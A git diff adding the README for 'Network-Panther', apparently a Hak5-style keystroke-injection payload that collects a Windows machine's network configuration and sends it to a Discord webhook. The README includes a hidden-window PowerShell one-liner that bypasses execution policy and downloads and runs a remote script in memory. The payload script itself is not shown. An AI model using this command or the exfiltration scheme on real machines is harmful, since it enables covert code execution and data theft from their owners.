diff --git a/payloads/library/exfiltration/Network-Panther/readme.md b/payloads/library/exfiltration/Network-Panther/readme.md new file mode 100644 index 0000000..4be0e61 --- /dev/null +++ b/payloads/library/exfiltration/Network-Panther/readme.md @@ -0,0 +1,86 @@ + +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# Network-Panther + +A payload to exfiltrate network configuration. Can be used to further attack a network in a pentest or gather information on targets. + +## Description + +This script will display the network configuration details on the console and also save them to a file in the same directory, then send to a discord webhook. +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +
+ + Link + +
+ + +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)